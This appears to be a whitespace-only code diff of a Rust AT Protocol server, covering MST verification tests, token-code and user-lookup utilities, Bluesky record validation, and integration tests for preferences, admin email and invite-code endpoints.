fn test_mst_validation_sorted_keys_ok() {
142
use ipld_core::ipld::Ipld;
143
let verifier = CarVerifier::new();
144
let record_cid = make_cid(b"record");
145
let entry1 = Ipld::Map(std::collections::BTreeMap::from([
···
167
let result = verifier.verify_mst_structure(&cid, &blocks);
168
assert!(result.is_ok());
169
}
170
#[test]
171
fn test_mst_validation_with_valid_left_pointer() {
172
use ipld_core::ipld::Ipld;
173
let verifier = CarVerifier::new();
174
let left_node = Ipld::Map(std::collections::BTreeMap::from([
175
("e".to_string(), Ipld::List(vec![])),
···
188
let result = verifier.verify_mst_structure(&root_cid, &blocks);
189
assert!(result.is_ok());
190
}
191
#[test]
192
fn test_mst_validation_cycle_detection() {
193
let verifier = CarVerifier::new();
···
200
let result = verifier.verify_mst_structure(&cid, &blocks);
201
assert!(result.is_ok());
202
}
203
#[tokio::test]
204
async fn test_unsupported_did_method() {
205
let verifier = CarVerifier::new();
···
209
assert!(matches!(err, VerifyError::DidResolutionFailed(_)));
210
assert!(err.to_string().contains("Unsupported"));
211
}
212
#[test]
213
fn test_mst_validation_with_prefix_compression() {
214
use ipld_core::ipld::Ipld;
215
let verifier = CarVerifier::new();
216
let record_cid = make_cid(b"record");
217
let entry1 = Ipld::Map(std::collections::BTreeMap::from([
···
239
let result = verifier.verify_mst_structure(&cid, &blocks);
240
assert!(result.is_ok(), "Prefix-compressed keys should be validated correctly");
241
}
242
#[test]
243
fn test_mst_validation_prefix_compression_unsorted() {
244
use ipld_core::ipld::Ipld;
245
let verifier = CarVerifier::new();
246
let record_cid = make_cid(b"record");
247
let entry1 = Ipld::Map(std::collections::BTreeMap::from([
···
5
use cid::Cid;
6
use sha2::{Digest, Sha256};
7
use std::collections::HashMap;
8
+
9
fn make_cid(data: &[u8]) -> Cid {
10
let mut hasher = Sha256::new();
11
hasher.update(data);
···
13
let multihash = multihash::Multihash::wrap(0x12, &hash).unwrap();
14
Cid::new_v1(0x71, multihash)
15
}
16
+
17
#[test]
18
fn test_verifier_creation() {
19
let _verifier = CarVerifier::new();
20
}
21
+
22
#[test]
23
fn test_verify_error_display() {
24
let err = VerifyError::DidMismatch {
···
34
let err = VerifyError::MstValidationFailed("test error".to_string());
35
assert!(err.to_string().contains("test error"));
36
}
37
+
38
#[test]
39
fn test_mst_validation_missing_root_block() {
40
let verifier = CarVerifier::new();
···
45
let err = result.unwrap_err();
46
assert!(matches!(err, VerifyError::BlockNotFound(_)));
47
}
48
+
49
#[test]
50
fn test_mst_validation_invalid_cbor() {
51
let verifier = CarVerifier::new();
···
58
let err = result.unwrap_err();
59
assert!(matches!(err, VerifyError::InvalidCbor(_)));
60
}
61
+
62
#[test]
63
fn test_mst_validation_empty_node() {
64
let verifier = CarVerifier::new();
···
71
let result = verifier.verify_mst_structure(&cid, &blocks);
72
assert!(result.is_ok());
73
}
74
+
75
#[test]
76
fn test_mst_validation_missing_left_pointer() {
77
use ipld_core::ipld::Ipld;
78
+
79
let verifier = CarVerifier::new();
80
let missing_left_cid = make_cid(b"missing left");
81
let node = Ipld::Map(std::collections::BTreeMap::from([
···
92
assert!(matches!(err, VerifyError::BlockNotFound(_)));
93
assert!(err.to_string().contains("left pointer"));
94
}
95
+
96
#[test]
97
fn test_mst_validation_missing_subtree() {
98
use ipld_core::ipld::Ipld;
99
+
100
let verifier = CarVerifier::new();
101
let missing_subtree_cid = make_cid(b"missing subtree");
102
let record_cid = make_cid(b"record");
···
119
assert!(matches!(err, VerifyError::BlockNotFound(_)));
120
assert!(err.to_string().contains("subtree"));
121
}
122
+
123
#[test]
124
fn test_mst_validation_unsorted_keys() {
125
use ipld_core::ipld::Ipld;
126
+
127
let verifier = CarVerifier::new();
128
let record_cid = make_cid(b"record");
129
let entry1 = Ipld::Map(std::collections::BTreeMap::from([
···
149
assert!(matches!(err, VerifyError::MstValidationFailed(_)));
150
assert!(err.to_string().contains("sorted"));
151
}
152
+
153
#[test]
154
fn test_mst_validation_sorted_keys_ok() {
155
use ipld_core::ipld::Ipld;
156
+
157
let verifier = CarVerifier::new();
158
let record_cid = make_cid(b"record");
159
let entry1 = Ipld::Map(std::collections::BTreeMap::from([
···
181
let result = verifier.verify_mst_structure(&cid, &blocks);
182
assert!(result.is_ok());
183
}
184
+
185
#[test]
186
fn test_mst_validation_with_valid_left_pointer() {
187
use ipld_core::ipld::Ipld;
188
+
189
let verifier = CarVerifier::new();
190
let left_node = Ipld::Map(std::collections::BTreeMap::from([
191
("e".to_string(), Ipld::List(vec![])),
···
204
let result = verifier.verify_mst_structure(&root_cid, &blocks);
205
assert!(result.is_ok());
206
}
207
+
208
#[test]
209
fn test_mst_validation_cycle_detection() {
210
let verifier = CarVerifier::new();
···
217
let result = verifier.verify_mst_structure(&cid, &blocks);
218
assert!(result.is_ok());
219
}
220
+
221
#[tokio::test]
222
async fn test_unsupported_did_method() {
223
let verifier = CarVerifier::new();
···
227
assert!(matches!(err, VerifyError::DidResolutionFailed(_)));
228
assert!(err.to_string().contains("Unsupported"));
229
}
230
+
231
#[test]
232
fn test_mst_validation_with_prefix_compression() {
233
use ipld_core::ipld::Ipld;
234
+
235
let verifier = CarVerifier::new();
236
let record_cid = make_cid(b"record");
237
let entry1 = Ipld::Map(std::collections::BTreeMap::from([
···
259
let result = verifier.verify_mst_structure(&cid, &blocks);
260
assert!(result.is_ok(), "Prefix-compressed keys should be validated correctly");
261
}
262
+
263
#[test]
264
fn test_mst_validation_prefix_compression_unsorted() {
265
use ipld_core::ipld::Ipld;
266
+
267
let verifier = CarVerifier::new();
268
let record_cid = make_cid(b"record");
269
let entry1 = Ipld::Map(std::collections::BTreeMap::from([
+16
src/util.rs
+16
src/util.rs
···
1
use rand::Rng;
2
use sqlx::PgPool;
3
use uuid::Uuid;
4
const BASE32_ALPHABET: &str = "abcdefghijklmnopqrstuvwxyz234567";
5
pub fn generate_token_code() -> String {
6
generate_token_code_parts(2, 5)
7
}
8
pub fn generate_token_code_parts(parts: usize, part_len: usize) -> String {
9
let mut rng = rand::thread_rng();
10
let chars: Vec<char> = BASE32_ALPHABET.chars().collect();
11
(0..parts)
12
.map(|_| {
13
(0..part_len)
···
17
.collect::<Vec<_>>()
18
.join("-")
19
}
20
#[derive(Debug)]
21
pub enum DbLookupError {
22
NotFound,
23
DatabaseError(sqlx::Error),
24
}
25
impl From<sqlx::Error> for DbLookupError {
26
fn from(e: sqlx::Error) -> Self {
27
DbLookupError::DatabaseError(e)
28
}
29
}
30
pub async fn get_user_id_by_did(db: &PgPool, did: &str) -> Result<Uuid, DbLookupError> {
31
sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
32
.fetch_optional(db)
33
.await?
34
.ok_or(DbLookupError::NotFound)
35
}
36
pub struct UserInfo {
37
pub id: Uuid,
38
pub did: String,
39
pub handle: String,
40
}
41
pub async fn get_user_by_did(db: &PgPool, did: &str) -> Result<UserInfo, DbLookupError> {
42
sqlx::query_as!(
43
UserInfo,
···
48
.await?
49
.ok_or(DbLookupError::NotFound)
50
}
51
pub async fn get_user_by_identifier(db: &PgPool, identifier: &str) -> Result<UserInfo, DbLookupError> {
52
sqlx::query_as!(
53
UserInfo,
···
58
.await?
59
.ok_or(DbLookupError::NotFound)
60
}
61
#[cfg(test)]
62
mod tests {
63
use super::*;
64
#[test]
65
fn test_generate_token_code() {
66
let code = generate_token_code();
67
assert_eq!(code.len(), 11);
68
assert!(code.contains('-'));
69
let parts: Vec<&str> = code.split('-').collect();
70
assert_eq!(parts.len(), 2);
71
assert_eq!(parts[0].len(), 5);
72
assert_eq!(parts[1].len(), 5);
73
for c in code.chars() {
74
if c != '-' {
75
assert!(BASE32_ALPHABET.contains(c));
76
}
77
}
78
}
79
#[test]
80
fn test_generate_token_code_parts() {
81
let code = generate_token_code_parts(3, 4);
82
let parts: Vec<&str> = code.split('-').collect();
83
assert_eq!(parts.len(), 3);
84
for part in parts {
85
assert_eq!(part.len(), 4);
86
}
···
1
use rand::Rng;
2
use sqlx::PgPool;
3
use uuid::Uuid;
4
+
5
const BASE32_ALPHABET: &str = "abcdefghijklmnopqrstuvwxyz234567";
6
+
7
pub fn generate_token_code() -> String {
8
generate_token_code_parts(2, 5)
9
}
10
+
11
pub fn generate_token_code_parts(parts: usize, part_len: usize) -> String {
12
let mut rng = rand::thread_rng();
13
let chars: Vec<char> = BASE32_ALPHABET.chars().collect();
14
+
15
(0..parts)
16
.map(|_| {
17
(0..part_len)
···
21
.collect::<Vec<_>>()
22
.join("-")
23
}
24
+
25
#[derive(Debug)]
26
pub enum DbLookupError {
27
NotFound,
28
DatabaseError(sqlx::Error),
29
}
30
+
31
impl From<sqlx::Error> for DbLookupError {
32
fn from(e: sqlx::Error) -> Self {
33
DbLookupError::DatabaseError(e)
34
}
35
}
36
+
37
pub async fn get_user_id_by_did(db: &PgPool, did: &str) -> Result<Uuid, DbLookupError> {
38
sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
39
.fetch_optional(db)
40
.await?
41
.ok_or(DbLookupError::NotFound)
42
}
43
+
44
pub struct UserInfo {
45
pub id: Uuid,
46
pub did: String,
47
pub handle: String,
48
}
49
+
50
pub async fn get_user_by_did(db: &PgPool, did: &str) -> Result<UserInfo, DbLookupError> {
51
sqlx::query_as!(
52
UserInfo,
···
57
.await?
58
.ok_or(DbLookupError::NotFound)
59
}
60
+
61
pub async fn get_user_by_identifier(db: &PgPool, identifier: &str) -> Result<UserInfo, DbLookupError> {
62
sqlx::query_as!(
63
UserInfo,
···
68
.await?
69
.ok_or(DbLookupError::NotFound)
70
}
71
+
72
#[cfg(test)]
73
mod tests {
74
use super::*;
75
+
76
#[test]
77
fn test_generate_token_code() {
78
let code = generate_token_code();
79
assert_eq!(code.len(), 11);
80
assert!(code.contains('-'));
81
+
82
let parts: Vec<&str> = code.split('-').collect();
83
assert_eq!(parts.len(), 2);
84
assert_eq!(parts[0].len(), 5);
85
assert_eq!(parts[1].len(), 5);
86
+
87
for c in code.chars() {
88
if c != '-' {
89
assert!(BASE32_ALPHABET.contains(c));
90
}
91
}
92
}
93
+
94
#[test]
95
fn test_generate_token_code_parts() {
96
let code = generate_token_code_parts(3, 4);
97
let parts: Vec<&str> = code.split('-').collect();
98
assert_eq!(parts.len(), 3);
99
+
100
for part in parts {
101
assert_eq!(part.len(), 4);
102
}
+30
src/validation/mod.rs
+30
src/validation/mod.rs
···
1
use serde_json::Value;
2
use thiserror::Error;
3
#[derive(Debug, Error)]
4
pub enum ValidationError {
5
#[error("No $type provided")]
···
17
#[error("Unknown record type: {0}")]
18
UnknownType(String),
19
}
20
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
21
pub enum ValidationStatus {
22
Valid,
23
Unknown,
24
Invalid,
25
}
26
pub struct RecordValidator {
27
require_lexicon: bool,
28
}
29
impl Default for RecordValidator {
30
fn default() -> Self {
31
Self::new()
32
}
33
}
34
impl RecordValidator {
35
pub fn new() -> Self {
36
Self {
37
require_lexicon: false,
38
}
39
}
40
pub fn require_lexicon(mut self, require: bool) -> Self {
41
self.require_lexicon = require;
42
self
43
}
44
pub fn validate(
45
&self,
46
record: &Value,
···
83
}
84
Ok(ValidationStatus::Valid)
85
}
86
fn validate_post(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
87
if !obj.contains_key("text") {
88
return Err(ValidationError::MissingField("text".to_string()));
···
127
}
128
Ok(())
129
}
130
fn validate_profile(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
131
if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) {
132
let grapheme_count = display_name.chars().count();
···
148
}
149
Ok(())
150
}
151
fn validate_like(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
152
if !obj.contains_key("subject") {
153
return Err(ValidationError::MissingField("subject".to_string()));
···
158
self.validate_strong_ref(obj.get("subject"), "subject")?;
159
Ok(())
160
}
161
fn validate_repost(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
162
if !obj.contains_key("subject") {
163
return Err(ValidationError::MissingField("subject".to_string()));
···
168
self.validate_strong_ref(obj.get("subject"), "subject")?;
169
Ok(())
170
}
171
fn validate_follow(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
172
if !obj.contains_key("subject") {
173
return Err(ValidationError::MissingField("subject".to_string()));
···
185
}
186
Ok(())
187
}
188
fn validate_block(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
189
if !obj.contains_key("subject") {
190
return Err(ValidationError::MissingField("subject".to_string()));
···
202
}
203
Ok(())
204
}
205
fn validate_list(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
206
if !obj.contains_key("name") {
207
return Err(ValidationError::MissingField("name".to_string()));
···
222
}
223
Ok(())
224
}
225
fn validate_list_item(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
226
if !obj.contains_key("subject") {
227
return Err(ValidationError::MissingField("subject".to_string()));
···
234
}
235
Ok(())
236
}
237
fn validate_feed_generator(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
238
if !obj.contains_key("did") {
239
return Err(ValidationError::MissingField("did".to_string()));
···
254
}
255
Ok(())
256
}
257
fn validate_threadgate(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
258
if !obj.contains_key("post") {
259
return Err(ValidationError::MissingField("post".to_string()));
···
263
}
264
Ok(())
265
}
266
fn validate_labeler_service(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
267
if !obj.contains_key("policies") {
268
return Err(ValidationError::MissingField("policies".to_string()));
···
272
}
273
Ok(())
274
}
275
fn validate_strong_ref(&self, value: Option<&Value>, path: &str) -> Result<(), ValidationError> {
276
let obj = value
277
.and_then(|v| v.as_object())
···
296
Ok(())
297
}
298
}
299
fn validate_datetime(value: &str, path: &str) -> Result<(), ValidationError> {
300
if chrono::DateTime::parse_from_rfc3339(value).is_err() {
301
return Err(ValidationError::InvalidDatetime {
···
304
}
305
Ok(())
306
}
307
pub fn validate_record_key(rkey: &str) -> Result<(), ValidationError> {
308
if rkey.is_empty() {
309
return Err(ValidationError::InvalidRecord("Record key cannot be empty".to_string()));
···
324
}
325
Ok(())
326
}
327
pub fn validate_collection_nsid(collection: &str) -> Result<(), ValidationError> {
328
if collection.is_empty() {
329
return Err(ValidationError::InvalidRecord("Collection NSID cannot be empty".to_string()));
···
348
}
349
Ok(())
350
}
351
#[cfg(test)]
352
mod tests {
353
use super::*;
354
use serde_json::json;
355
#[test]
356
fn test_validate_post() {
357
let validator = RecordValidator::new();
···
365
ValidationStatus::Valid
366
);
367
}
368
#[test]
369
fn test_validate_post_missing_text() {
370
let validator = RecordValidator::new();
···
374
});
375
assert!(validator.validate(&invalid_post, "app.bsky.feed.post").is_err());
376
}
377
#[test]
378
fn test_validate_type_mismatch() {
379
let validator = RecordValidator::new();
···
385
let result = validator.validate(&record, "app.bsky.feed.post");
386
assert!(matches!(result, Err(ValidationError::TypeMismatch { .. })));
387
}
388
#[test]
389
fn test_validate_unknown_type() {
390
let validator = RecordValidator::new();
···
397
ValidationStatus::Unknown
398
);
399
}
400
#[test]
401
fn test_validate_unknown_type_strict() {
402
let validator = RecordValidator::new().require_lexicon(true);
···
407
let result = validator.validate(&record, "com.example.custom");
408
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
409
}
410
#[test]
411
fn test_validate_record_key() {
412
assert!(validate_record_key("valid-key_123").is_ok());
···
416
assert!(validate_record_key("").is_err());
417
assert!(validate_record_key("invalid/key").is_err());
418
}
419
#[test]
420
fn test_validate_collection_nsid() {
421
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
···
1
use serde_json::Value;
2
use thiserror::Error;
3
+
4
#[derive(Debug, Error)]
5
pub enum ValidationError {
6
#[error("No $type provided")]
···
18
#[error("Unknown record type: {0}")]
19
UnknownType(String),
20
}
21
+
22
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
23
pub enum ValidationStatus {
24
Valid,
25
Unknown,
26
Invalid,
27
}
28
+
29
pub struct RecordValidator {
30
require_lexicon: bool,
31
}
32
+
33
impl Default for RecordValidator {
34
fn default() -> Self {
35
Self::new()
36
}
37
}
38
+
39
impl RecordValidator {
40
pub fn new() -> Self {
41
Self {
42
require_lexicon: false,
43
}
44
}
45
+
46
pub fn require_lexicon(mut self, require: bool) -> Self {
47
self.require_lexicon = require;
48
self
49
}
50
+
51
pub fn validate(
52
&self,
53
record: &Value,
···
90
}
91
Ok(ValidationStatus::Valid)
92
}
93
+
94
fn validate_post(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
95
if !obj.contains_key("text") {
96
return Err(ValidationError::MissingField("text".to_string()));
···
135
}
136
Ok(())
137
}
138
+
139
fn validate_profile(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
140
if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) {
141
let grapheme_count = display_name.chars().count();
···
157
}
158
Ok(())
159
}
160
+
161
fn validate_like(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
162
if !obj.contains_key("subject") {
163
return Err(ValidationError::MissingField("subject".to_string()));
···
168
self.validate_strong_ref(obj.get("subject"), "subject")?;
169
Ok(())
170
}
171
+
172
fn validate_repost(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
173
if !obj.contains_key("subject") {
174
return Err(ValidationError::MissingField("subject".to_string()));
···
179
self.validate_strong_ref(obj.get("subject"), "subject")?;
180
Ok(())
181
}
182
+
183
fn validate_follow(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
184
if !obj.contains_key("subject") {
185
return Err(ValidationError::MissingField("subject".to_string()));
···
197
}
198
Ok(())
199
}
200
+
201
fn validate_block(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
202
if !obj.contains_key("subject") {
203
return Err(ValidationError::MissingField("subject".to_string()));
···
215
}
216
Ok(())
217
}
218
+
219
fn validate_list(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
220
if !obj.contains_key("name") {
221
return Err(ValidationError::MissingField("name".to_string()));
···
236
}
237
Ok(())
238
}
239
+
240
fn validate_list_item(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
241
if !obj.contains_key("subject") {
242
return Err(ValidationError::MissingField("subject".to_string()));
···
249
}
250
Ok(())
251
}
252
+
253
fn validate_feed_generator(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
254
if !obj.contains_key("did") {
255
return Err(ValidationError::MissingField("did".to_string()));
···
270
}
271
Ok(())
272
}
273
+
274
fn validate_threadgate(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
275
if !obj.contains_key("post") {
276
return Err(ValidationError::MissingField("post".to_string()));
···
280
}
281
Ok(())
282
}
283
+
284
fn validate_labeler_service(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
285
if !obj.contains_key("policies") {
286
return Err(ValidationError::MissingField("policies".to_string()));
···
290
}
291
Ok(())
292
}
293
+
294
fn validate_strong_ref(&self, value: Option<&Value>, path: &str) -> Result<(), ValidationError> {
295
let obj = value
296
.and_then(|v| v.as_object())
···
315
Ok(())
316
}
317
}
318
+
319
fn validate_datetime(value: &str, path: &str) -> Result<(), ValidationError> {
320
if chrono::DateTime::parse_from_rfc3339(value).is_err() {
321
return Err(ValidationError::InvalidDatetime {
···
324
}
325
Ok(())
326
}
327
+
328
pub fn validate_record_key(rkey: &str) -> Result<(), ValidationError> {
329
if rkey.is_empty() {
330
return Err(ValidationError::InvalidRecord("Record key cannot be empty".to_string()));
···
345
}
346
Ok(())
347
}
348
+
349
pub fn validate_collection_nsid(collection: &str) -> Result<(), ValidationError> {
350
if collection.is_empty() {
351
return Err(ValidationError::InvalidRecord("Collection NSID cannot be empty".to_string()));
···
370
}
371
Ok(())
372
}
373
+
374
#[cfg(test)]
375
mod tests {
376
use super::*;
377
use serde_json::json;
378
+
379
#[test]
380
fn test_validate_post() {
381
let validator = RecordValidator::new();
···
389
ValidationStatus::Valid
390
);
391
}
392
+
393
#[test]
394
fn test_validate_post_missing_text() {
395
let validator = RecordValidator::new();
···
399
});
400
assert!(validator.validate(&invalid_post, "app.bsky.feed.post").is_err());
401
}
402
+
403
#[test]
404
fn test_validate_type_mismatch() {
405
let validator = RecordValidator::new();
···
411
let result = validator.validate(&record, "app.bsky.feed.post");
412
assert!(matches!(result, Err(ValidationError::TypeMismatch { .. })));
413
}
414
+
415
#[test]
416
fn test_validate_unknown_type() {
417
let validator = RecordValidator::new();
···
424
ValidationStatus::Unknown
425
);
426
}
427
+
428
#[test]
429
fn test_validate_unknown_type_strict() {
430
let validator = RecordValidator::new().require_lexicon(true);
···
435
let result = validator.validate(&record, "com.example.custom");
436
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
437
}
438
+
439
#[test]
440
fn test_validate_record_key() {
441
assert!(validate_record_key("valid-key_123").is_ok());
···
445
assert!(validate_record_key("").is_err());
446
assert!(validate_record_key("invalid/key").is_err());
447
}
448
+
449
#[test]
450
fn test_validate_collection_nsid() {
451
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
+11
tests/actor.rs
+11
tests/actor.rs
···
1
mod common;
2
use common::{base_url, client, create_account_and_login};
3
use serde_json::{json, Value};
4
#[tokio::test]
5
async fn test_get_preferences_empty() {
6
let client = client();
···
17
assert!(body.get("preferences").is_some());
18
assert!(body["preferences"].as_array().unwrap().is_empty());
19
}
20
#[tokio::test]
21
async fn test_get_preferences_no_auth() {
22
let client = client();
···
28
.unwrap();
29
assert_eq!(resp.status(), 401);
30
}
31
#[tokio::test]
32
async fn test_put_preferences_success() {
33
let client = client();
···
70
assert!(adult_pref.is_some());
71
assert_eq!(adult_pref.unwrap()["enabled"], true);
72
}
73
#[tokio::test]
74
async fn test_put_preferences_no_auth() {
75
let client = client();
···
85
.unwrap();
86
assert_eq!(resp.status(), 401);
87
}
88
#[tokio::test]
89
async fn test_put_preferences_missing_type() {
90
let client = client();
···
108
let body: Value = resp.json().await.unwrap();
109
assert_eq!(body["error"], "InvalidRequest");
110
}
111
#[tokio::test]
112
async fn test_put_preferences_invalid_namespace() {
113
let client = client();
···
132
let body: Value = resp.json().await.unwrap();
133
assert_eq!(body["error"], "InvalidRequest");
134
}
135
#[tokio::test]
136
async fn test_put_preferences_read_only_rejected() {
137
let client = client();
···
156
let body: Value = resp.json().await.unwrap();
157
assert_eq!(body["error"], "InvalidRequest");
158
}
159
#[tokio::test]
160
async fn test_put_preferences_replaces_all() {
161
let client = client();
···
208
assert_eq!(prefs_arr.len(), 1);
209
assert_eq!(prefs_arr[0]["$type"], "app.bsky.actor.defs#threadViewPref");
210
}
211
#[tokio::test]
212
async fn test_put_preferences_saved_feeds() {
213
let client = client();
···
249
assert_eq!(saved_feeds["$type"], "app.bsky.actor.defs#savedFeedsPrefV2");
250
assert!(saved_feeds["items"].as_array().unwrap().len() == 1);
251
}
252
#[tokio::test]
253
async fn test_put_preferences_muted_words() {
254
let client = client();
···
286
let prefs_arr = body["preferences"].as_array().unwrap();
287
assert_eq!(prefs_arr[0]["$type"], "app.bsky.actor.defs#mutedWordsPref");
288
}
289
#[tokio::test]
290
async fn test_preferences_isolation_between_users() {
291
let client = client();
···
1
mod common;
2
use common::{base_url, client, create_account_and_login};
3
use serde_json::{json, Value};
4
+
5
#[tokio::test]
6
async fn test_get_preferences_empty() {
7
let client = client();
···
18
assert!(body.get("preferences").is_some());
19
assert!(body["preferences"].as_array().unwrap().is_empty());
20
}
21
+
22
#[tokio::test]
23
async fn test_get_preferences_no_auth() {
24
let client = client();
···
30
.unwrap();
31
assert_eq!(resp.status(), 401);
32
}
33
+
34
#[tokio::test]
35
async fn test_put_preferences_success() {
36
let client = client();
···
73
assert!(adult_pref.is_some());
74
assert_eq!(adult_pref.unwrap()["enabled"], true);
75
}
76
+
77
#[tokio::test]
78
async fn test_put_preferences_no_auth() {
79
let client = client();
···
89
.unwrap();
90
assert_eq!(resp.status(), 401);
91
}
92
+
93
#[tokio::test]
94
async fn test_put_preferences_missing_type() {
95
let client = client();
···
113
let body: Value = resp.json().await.unwrap();
114
assert_eq!(body["error"], "InvalidRequest");
115
}
116
+
117
#[tokio::test]
118
async fn test_put_preferences_invalid_namespace() {
119
let client = client();
···
138
let body: Value = resp.json().await.unwrap();
139
assert_eq!(body["error"], "InvalidRequest");
140
}
141
+
142
#[tokio::test]
143
async fn test_put_preferences_read_only_rejected() {
144
let client = client();
···
163
let body: Value = resp.json().await.unwrap();
164
assert_eq!(body["error"], "InvalidRequest");
165
}
166
+
167
#[tokio::test]
168
async fn test_put_preferences_replaces_all() {
169
let client = client();
···
216
assert_eq!(prefs_arr.len(), 1);
217
assert_eq!(prefs_arr[0]["$type"], "app.bsky.actor.defs#threadViewPref");
218
}
219
+
220
#[tokio::test]
221
async fn test_put_preferences_saved_feeds() {
222
let client = client();
···
258
assert_eq!(saved_feeds["$type"], "app.bsky.actor.defs#savedFeedsPrefV2");
259
assert!(saved_feeds["items"].as_array().unwrap().len() == 1);
260
}
261
+
262
#[tokio::test]
263
async fn test_put_preferences_muted_words() {
264
let client = client();
···
296
let prefs_arr = body["preferences"].as_array().unwrap();
297
assert_eq!(prefs_arr[0]["$type"], "app.bsky.actor.defs#mutedWordsPref");
298
}
299
+
300
#[tokio::test]
301
async fn test_preferences_isolation_between_users() {
302
let client = client();
+8
tests/admin_email.rs
+8
tests/admin_email.rs
···
1
mod common;
2
use reqwest::StatusCode;
3
use serde_json::{json, Value};
4
use sqlx::PgPool;
5
async fn get_pool() -> PgPool {
6
let conn_str = common::get_db_connection_string().await;
7
sqlx::postgres::PgPoolOptions::new()
···
10
.await
11
.expect("Failed to connect to test database")
12
}
13
#[tokio::test]
14
async fn test_send_email_success() {
15
let client = common::client();
···
45
assert_eq!(notification.subject.as_deref(), Some("Test Admin Email"));
46
assert!(notification.body.contains("Hello, this is a test email from the admin."));
47
}
48
#[tokio::test]
49
async fn test_send_email_default_subject() {
50
let client = common::client();
···
79
assert!(notification.subject.is_some());
80
assert!(notification.subject.unwrap().contains("Message from"));
81
}
82
#[tokio::test]
83
async fn test_send_email_recipient_not_found() {
84
let client = common::client();
···
99
let body: Value = res.json().await.expect("Invalid JSON");
100
assert_eq!(body["error"], "AccountNotFound");
101
}
102
#[tokio::test]
103
async fn test_send_email_missing_content() {
104
let client = common::client();
···
119
let body: Value = res.json().await.expect("Invalid JSON");
120
assert_eq!(body["error"], "InvalidRequest");
121
}
122
#[tokio::test]
123
async fn test_send_email_missing_recipient() {
124
let client = common::client();
···
139
let body: Value = res.json().await.expect("Invalid JSON");
140
assert_eq!(body["error"], "InvalidRequest");
141
}
142
#[tokio::test]
143
async fn test_send_email_requires_auth() {
144
let client = common::client();
···
1
mod common;
2
+
3
use reqwest::StatusCode;
4
use serde_json::{json, Value};
5
use sqlx::PgPool;
6
+
7
async fn get_pool() -> PgPool {
8
let conn_str = common::get_db_connection_string().await;
9
sqlx::postgres::PgPoolOptions::new()
···
12
.await
13
.expect("Failed to connect to test database")
14
}
15
+
16
#[tokio::test]
17
async fn test_send_email_success() {
18
let client = common::client();
···
48
assert_eq!(notification.subject.as_deref(), Some("Test Admin Email"));
49
assert!(notification.body.contains("Hello, this is a test email from the admin."));
50
}
51
+
52
#[tokio::test]
53
async fn test_send_email_default_subject() {
54
let client = common::client();
···
83
assert!(notification.subject.is_some());
84
assert!(notification.subject.unwrap().contains("Message from"));
85
}
86
+
87
#[tokio::test]
88
async fn test_send_email_recipient_not_found() {
89
let client = common::client();
···
104
let body: Value = res.json().await.expect("Invalid JSON");
105
assert_eq!(body["error"], "AccountNotFound");
106
}
107
+
108
#[tokio::test]
109
async fn test_send_email_missing_content() {
110
let client = common::client();
···
125
let body: Value = res.json().await.expect("Invalid JSON");
126
assert_eq!(body["error"], "InvalidRequest");
127
}
128
+
129
#[tokio::test]
130
async fn test_send_email_missing_recipient() {
131
let client = common::client();
···
146
let body: Value = res.json().await.expect("Invalid JSON");
147
assert_eq!(body["error"], "InvalidRequest");
148
}
149
+
150
#[tokio::test]
151
async fn test_send_email_requires_auth() {
152
let client = common::client();
+12
tests/admin_invite.rs
+12
tests/admin_invite.rs
···
1
mod common;
2
use common::*;
3
use reqwest::StatusCode;
4
use serde_json::{Value, json};
5
#[tokio::test]
6
async fn test_admin_get_invite_codes_success() {
7
let client = client();
···
32
let body: Value = res.json().await.expect("Response was not valid JSON");
33
assert!(body["codes"].is_array());
34
}
35
#[tokio::test]
36
async fn test_admin_get_invite_codes_with_limit() {
37
let client = client();
···
65
let codes = body["codes"].as_array().unwrap();
66
assert!(codes.len() <= 2);
67
}
68
#[tokio::test]
69
async fn test_admin_get_invite_codes_no_auth() {
70
let client = client();
···
78
.expect("Failed to send request");
79
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
80
}
81
#[tokio::test]
82
async fn test_disable_account_invites_success() {
83
let client = client();
···
113
let body: Value = res.json().await.expect("Response was not valid JSON");
114
assert_eq!(body["error"], "InvitesDisabled");
115
}
116
#[tokio::test]
117
async fn test_enable_account_invites_success() {
118
let client = client();
···
158
.expect("Failed to send request");
159
assert_eq!(res.status(), StatusCode::OK);
160
}
161
#[tokio::test]
162
async fn test_disable_account_invites_no_auth() {
163
let client = client();
···
175
.expect("Failed to send request");
176
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
177
}
178
#[tokio::test]
179
async fn test_disable_account_invites_not_found() {
180
let client = client();
···
194
.expect("Failed to send request");
195
assert_eq!(res.status(), StatusCode::NOT_FOUND);
196
}
197
#[tokio::test]
198
